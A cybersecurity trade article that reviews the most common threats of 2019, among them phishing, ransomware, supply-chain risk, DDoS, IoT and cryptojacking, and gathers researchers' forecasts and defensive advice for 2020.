Making cybersecurity predictions is fun, but not necessarily helpful to security professionals who must decide which threats for which they should be the most prepared. \u201cYou can't really make a good prediction about what the future's going to hold because it's always the stuff that comes out of left field that really becomes the problem,\u201d says Chad Seaman, senior engineer on Akamai's security intelligence response team. \u00a0If your biggest threat for 2020 is something new and unpredictable, how can you best focus your efforts in the coming year? Start by looking at how this year\u2019s biggest threats are likely to change in 2020 in terms of scale and tactics.CSO has reviewed the leading research on the most common, significant threats of 2019 and asked those researchers for their advice on where those threats will trend and how organizations might adjust their defenses against them in 2020. Here\u2019s what we learned.Malware infections of devicesProtecting endpoints has continued to be a battle for organizations. About half of all organizations suffered a malware infection on company-owned devices in 2019, according to Kaspersky\u2019s IT Security Economics in 2019 report. Half also saw malware infections on employee-owned devices.For the enterprise, malware infections on company devices was the most expensive incident cited on the Kaspersky report with an average cost per incident of $2.73 million. That number was significantly less for SMBs at $117,000.What to expect in 2020: Dmitry Galov, security researcher at Kaspersky, sees the risk from employee-owned devices increasing in 2020. He sees a greater willingness for companies to allow employees to use their own devices to cut costs, enable remote work, and increase employee satisfaction. As a result, attackers will target personal devices as a way to bypass corporate defenses. \u201cBy default, users\u2019 personal devices tend to be less protected than corporate devices as the average users seldom apply additional measures to protect their phones and computers from potential threats,\u201d he says. \u201cAs long as this trend continues, company and employee-owned device infections will arise. This vector of attack remains attractive because the attacker no longer needs to target corporate accounts (for instance, with phishing emails sent to corporate mail).\u201cBest advice for 2020: Companies must review and update their policies around personal devices, and then enforce those policies, Galov believes. \u201cStrict company policies regarding security, correct rights management and provision of users with security solutions are on the list of must haves to protect the company and its data,\u201d he says. \u201cAs well as managing technical issues, security awareness trainings are important because they can cultivate standards of cyber hygiene among employees.\u201dPhishingNearly a third of all breaches in the past year involved phishing, according to the 2019 Verizon Data Breach Investigations Report. For cyber-espionage attacks, that number jumps to 78%. The worst phishing news for 2019 is that its perpetrators are getting much, much better at it thanks to well-produced, off-the-shelf tools and templates.Akamai\u2019s SOTI Report: Baiting the Hook broke down the phishing-as-a-service offered by one phishing kit developer. This developer has a storefront and advertises on social media. Prices start at $99 and go up depending on the mailing services selected. All the kits come with security and evasion features. \u201cThe low prices and top-tier brand targets are attractive, creating a low bar for entry into the phishing market for criminals looking to set up shop,\u201d said the report\u2019s authors. Among those top-tier brands targeted are Target, Google, Microsoft, Apple, Lyft and Walmart.What to expect in 2020: Phishing kit developers will offer more refined products, further lowering the skill required to launch a phishing campaign. According to the IDG Security Priorities Study, 44% of companies say that increasing their security awareness and staff training priorities is a top priority for 2020. Attackers will respond by improving the quality of their phishing campaigns by minimizing or hiding common signs of a phish. Expect greater use of business email compromise (BEC), too, where an attacker sends legitimate-looking phishing attempts through fraudulent or compromised internal or third-party accounts.Best advice for 2020: Keep your anti-phishing training up to date and make it ongoing. To combat BEC, have policies in place that require any employee receiving a request regarding money or payment instructions to confirm by phone.Ransomware attacksRansomware attacks are not the most common cybersecurity incident, but they can be among the most costly. Roughly 40% of SMBs and enterprises experienced a ransomware incident in 2019, according to Kaspersky\u2019s IT Security Economics in 2019 report. At the enterprise level, the average cost per incident was $1.46 million.Endpoint protection tools are getting better at detecting ransomware, but that has made ransomware developers better students of the techniques those tools use, according to the Sophos Labs 2020 Threat Report. \u201cIt is a lot easier to change a malware\u2019s appearance than to change its purpose or behavior, which is why modern ransomware relies on obfuscation to be successful,\u201d says Mark Loman, director of engineering for next-generation tech\u00a0at Sophos. \u201cHowever, in 2020, ransomware will raise the stakes by changing or adding traits to confuse some anti-ransomware protection.\u201dSome of that obfuscation is to make the ransomware appear to be from a trusted source. The Sophos reports cites several examples:Crafting a script listing targeted machines and incorporating them together with the PsExec utility from Microsoft Sysinternals, a privileged domain account, and the ransomware.Leveraging a logon\/logoff script via a Windows Group Policy ObjectAbusing the Windows Management Interface to mass distribute inside a networkWhat to expect in 2020: Loman sees ransomware attackers continuing to tweak their methods to give themselves an edge. \u201cAmong the most notable advancements is an increase in ransomware attackers raising the stakes with automated, active attacks\u00a0that blend human ingenuity with automation tools to cause maximum impact,\u201d he says. \u201cAdditionally, by encrypting only a relatively small part of each file or booting the operating system to a diagnostic mode where anti-ransomware protection is often unavailable, attackers will continue to evade most defenses.\u201d\u00a0\u201cRansomware attacks have been loud this year and there is no reason for this type of threat to decline,\u201d says Kaspersky\u2019s Galov.\u201d Ransomware increasingly targets infrastructure, organizations and even smart cities.\u201dRansomware developers will make their code more evasive so that they can establish a foothold in a system, encrypt more data without being noticed, and possibly scale operations to other networks. \u201cThis year we saw the appearance of attacks even on Network Attached Storage (NAS), which is largely considered secure and safe from such threats,\u201d says Galov.Best advice for 2020: As always, the best defense against ransomware is to have current, tested backups of all critical data. Keep those backups isolated from your network so they, too, aren\u2019t encrypted by the ransomware. Employee training is critical, too. \u201cIn order to protect themselves from ransomware, organizations need to implement strict security policies and introduce cybersecurity trainings to the employees,\u201d says Galov. \u201cAdditional protective measures, such as securing access to data, ensuring its backups are stored securely and implementing application whitelisting techniques on servers, are required.\u201d\u201cIt is vital to have robust security controls, monitoring and response in place covering all endpoints, networks and systems, and to install software updates whenever they are issued,\u201d says Loman.Third-party supplier riskBoth enterprises and SMBs saw incidents involving third-party suppliers (both services and products) at a similar rate, 43% and 38%, respectively, according to Kaspersky\u2019s IT Security Economics in 2019 report. Most organizations (94%) grant third-party access to their network, according to a survey by One Identity, and 72% grant privileged access. Yet only 22% felt confident those third parties weren\u2019t accessing unauthorized information, while 18% reported a breach due to third-party access.The Kaspersky study shows that both SMBs and enterprises are forcing third-party suppliers to sign security policy agreements\u201475% of SMBs and 79% of enterprises use them. That\u2019s making a big difference when it comes to getting compensation from third parties when they are responsible for a breach. Of enterprises with a policy in place, 71% reported they received compensation, while only 22% of companies without a policy received compensation.What to expect in 2020: Businesses will become more digitally connected with their suppliers and partners. That raises risk as well as awareness of that risk. Unfortunately, attackers are becoming more sophisticated.\u201cRecently, we've observed some new groups such as BARIUM or APT41 engage in sophisticated supply chain attacks against software and hardware manufacturers in order to penetrate secure infrastructures around the world,\u201d says Galov. \u201cThese include two sophisticated supply chain attacks uncovered in 2017 and 2019: the CCleaner attack and ShadowPad, and other attacks against gaming companies. Dealing with a compromise from one of these threat actors is a complex process, as they usually leave backdoors allowing them to return later and cause even more havoc.\u201dBest advice for 2020: Know who has access to your networks and ensure they have only the privileges they need. Have policies in place for communicating and enforcing rules for third-party access. Make sure you have a security policy in place for all your third-party suppliers that spells out responsibilities, security expectations, and what happens when an incident occurs.\u201cThe best organizations can do to protect themselves from such attacks is to make sure that not only they, but also their partners, follow high cybersecurity standards,\u201d says Galov. \u201cIf third-party suppliers get any kind of access to internal infrastructure or data, cybersecurity policies should be established before the integration process.DDoS attacksForty-two percent of enterprises and 38% of SMBs experienced a distributed denial of service (DDoS) attack in 2019, according to Kaspersky\u2019s IT Security Economics in 2019 report. That\u2019s on par with ransomware incidents, which get much more media attention. From a financial perspective, DDoS attacks cost SMBs an average of $138,000.\u00a0Attackers continue to innovate to improve the effectiveness of their DDoS attacks. In September, for example, Akamai reported a new DDoS vector: Web Services Dynamic Discovery (WSD), a multicast discovery protocol to locate services on a local network. Using WSD, attackers can locate and compromise misconfigured, internet-connected devices at scale to amplify the scope of their DDoS attacks.What to expect in 2020: Kasperksy\u2019s Galov sees DDoS attacks staying \u201cquite prominent\u201d in 2020 thanks to the rise of 5G and numbers of IoT devices. \u201cThe conventional boundaries of critical infrastructure such as water supply, energy grid, military facilities and financial institutions will expand much further to other unprecedented areas in a 5G-connected world,\u201d he says. \u201cAll these will require new standards of safety, and the increased speed of connection will pose new challenges in stopping DDoS attacks from happening.\u201dBest advice for 2020: Do everyone a favor and check your internet-connected devices for misconfigurations and unpatched vulnerabilities. \u201cIt's security hygiene, basic security hygiene,\u201d says Akamai\u2019s Seaman.Unfortunately, that won\u2019t help the risk of DDoS attacks aided by connected consumer devices. \u201cGrandma going to Best Buy to pick up a new webcam to put on the driveway so she can see who pulls in isn't going to know about the hygiene of this device,\u201d says Seaman. \u201cThat's where we continue to see the bigger problems, and it's not grandma. It's really some guy in Vietnam who has a VDR security system for his small shop. The last of his concerns is whether his webcam being used to DDoS a bank.\u201dApplication vulnerabilitiesAccording to Veracode\u2019s State of Software Security Vol. 10 report, 83% of the 85,000 applications it tested had at least one security flaw. Many had much more, as their research found a total of 10 million flaws, and 20% of all apps had at least one high-severity flaw. That leaves a lot of opportunity in terms of potential zero-day vulnerabilities and exploitable bugs for attackers to take advantage of.The report authors see optimism in some of the data. Fix rates, especially for high-severity flaws, are improving. The overall fix rate is 56%, up from 52% in 2018, and the highest severity flaws are fixed at a rate of 75.7%. The biggest positive, however, is that a DevSecOps approach with frequent scanning and testing of software will drive down the time to fix flaws. Median time to repair for applications scanned 12 times or fewer per year was 68 days, while an average scan rate of daily or more lowered that rate to 19 days.What to expect in 2020: Despite the best efforts of security and development teams, vulnerabilities will continue to creep into software. \u201cMost software today is very insecure. That will continue in 2020, especially with 90% of applications using code from open-source libraries,\u201d says Chris Wysopal, co-founder and CTO at Veracode. \u201cWe\u2019ve seen some positive AppSec signs in 2019. Organizations are increasingly focused on not just finding security vulnerabilities, but fixing them, and prioritizing the flaws that put them most at risk\u2026. Our data suggests that finding and fixing vulnerabilities is becoming just as much a part of the process as improving functionality.\u201dBest advice for 2020: As the Veracode research shows, scanning and testing your apps for vulnerabilities more frequently while prioritizing the most severe flaws to be fixed is an effective defense. Wysopal also urges companies to keep an eye on security debt. \u201cOne of the growing threats within application security is the notion of security debt \u2013 whether applications are accruing or eliminating flaws over time,\u201d he says. A growing security debt leaves organizations exposed to attacks.\u201cJust as with credit card debt, if you start out with a big balance and only pay for each month\u2019s new spending, you\u2019ll never eliminate the balance,\u201d Wysopal says. \u201cIn AppSec, you have to address the new security findings while chipping away at the old.\u201dCloud services\/hosted infrastructure incidentsForty-three percent of enterprise businesses had security incidents that affected third-party cloud services in 2019, according to Kaspersky\u2019s IT Security Economics in 2019 report. Although cloud-related incidents didn\u2019t make the SMB most frequent list, they were expensive for smaller companies, which often are more dependent on hosted services. The average incident that affected hosted infrastructure for SMBs was $162,000.One area that saw an uptick in activity in 2019 was online payment fraud. The Magecart criminal group in particular was quite busy this past year. The group uses code that takes advantage of misconfigurations in the cloud to modify shopping cart code. The businesses using the online ecommerce services are unaware of the change until customers complain of fraudulent charges.Organizations still need to worry about misconfiguring cloud services in a way that leaves data exposed on the internet. Attackers regularly scan the internet to grab this exposed data. Fortunately, cloud platform vendors such as Amazon and Google have rolled out new tools and services in 2019 to help organizations properly configure their cloud systems and find errors that leave data unprotected.What to expect in 2020: The staying power of the malicious code and the financial reward (Magecart\u2019s haul alone is estimated to be millions of dollars) means online payment fraud will increase in 2020. Magecart\u2019s success is bound to inspire imitators. Organizations will counter this and other cloud threats by spending more on cloud security. According to the IDG Security Priorities Study, only 27% of organizations have cloud data protection technology in production, but 49% are researching or piloting it.Best advice for 2020: Conduct source code reviews of your ecommerce scripts and Implement\u00a0subresource\u00a0integrity\u00a0so that modified scripts are not loaded without your permission. Make sure your cloud providers conduct assessments of their own code to prevent fraud.\u00a0Do regular scans for configuration errors that expose your data on the internet.IoT vulnerabilitiesThe internet of things (IoT) and the data it generates was the second most impactful trend on security practitioners in 2019, according to the Security Industry Association (SIA) 2019 Security Megatrends report. The growth of IoT is nothing short of manic and difficult to predict. Research firm Statista estimates there will be between 6.6 billion and 30 billion internet-connected devices in 2020, a range too large to be helpful.The threat IoT poses has been front of mind in 2019 for most organizations. The Marsh Microsoft 2019 Global Risk Perception Survey found that 66% of respondents saw IoT as a cyber risk; 23% rated that risk \u201cextremely high.\u201d \u201cThese IoT devices are soft targets for adversaries because they are often unpatched and misconfigured, and they're \u2018unmanaged\u2019 because they don't support endpoint security agents,\u201d says Phil Neray, vice president of industrial cybersecurity at CyberX. \u201cAs a result, they can easily be compromised by adversaries to gain a foothold in corporate networks, conduct destructive ransomware attacks, steal sensitive intellectual property, and siphon computing resources for DDoS campaigns and cryptojacking.\u201dCyberX\u2019s 2020 Global IoT\/ICS Risk Report breaks down the most common security gaps that make IoT devices vulnerable over the past 12 months. It shows significant improvement in a few areas. Remotely accessible devices dropped 30 percentage points with the vulnerability found on 54% of surveyed sites. Direct internet connections also fell from 40% to 27%.On the downside, outdated operating systems were found at 71% of the sites versus 53% the previous year, and 66% of the sites failed to do automatic antivirus updates compared to 43% the previous year.What to expect in 2020:\u00a0Neray sees the risk from exposed IoT devices increasing in 2020 as the number of connected devices increases and \u201dthe motivation and sophistication of nation-state adversaries and cybercriminals increases.\u201d Industrial environments such as energy utilities, manufacturing, chemicals, pharmaceuticals and oil and gas will especially be at risk, he says. \u201cThese compromises can lead to even more serious consequences including costly plant downtime, threats to human safety and environmental incidents.\u201dNeray identifies building management systems (BMS) as a prime target for attackers. \u201cThey're typically deployed by facilities management teams with minimal expertise in security, often unknowingly exposed to the internet, and typically not monitored by corporate security operations\u00a0centers (SOCs).\u201d\u00a0Best advice for 2020: Neray advises companies to follow a multi-layered defense-in-depth strategy incorporatingStronger network segmentationRestricted remote access to industrial control networks by third-party contractors with strong access controls such as 2FA and password vaultAgentless network security monitoring to rapidly detect and mitigate IoT attacks before adversaries can blow up or shut down their facilities.Ultimately, the best defense depends more focus on organizational rather than technical approaches. \u201cIn the TRITON attack on the safety\u00a0systems of a petrochemical facility in Saudi Arabia, for example, one of the key deficiencies was that no one considered themselves ultimately responsible for the security of the industrial control network,\u201d says Neray. \u201cAs a result, there were serious lapses in security monitoring and no one checked that the firewalls in the DMZ had been properly configured by the outsourced firms that installed them. Our advice for CISOs is to step up to the plate and take ownership of IoT and OT security and treat IoT and OT security in a holistic manner alongside IT security, integrated into your SOC workflows and security stack.CryptojackingLet\u2019s end this list with some good news: Cryptomining attacks are expected to decline in 2020. Although cryptomining attacks did not make the most-frequent list for either enterprises or SMBs on Kaspersky\u2019s IT Security Economics in 2019 report, they proved costly for enterprises in 2019. The average financial impact for them was $1.62 million.What to expect for 2020: Cryptomining incidences rise or fall with cryptocurrency values, but the ease with which attackers can execute a cryptojacking scheme means this threat will persist through 2020. \u201cMining has been steadily declining throughout 2019 and we do not see any reason for this tendency to change,\u201d says Galov.\u201d Cryptomining has become less profitable, not without the influence of cryptocurrencies that have taken the fight against this threat.\u201dBest advice for 2020: Use a security solution that detects cryptomining threats and keep an eye out for spikes in cryptocurrency values, which will encourage more cryptojacking attacks.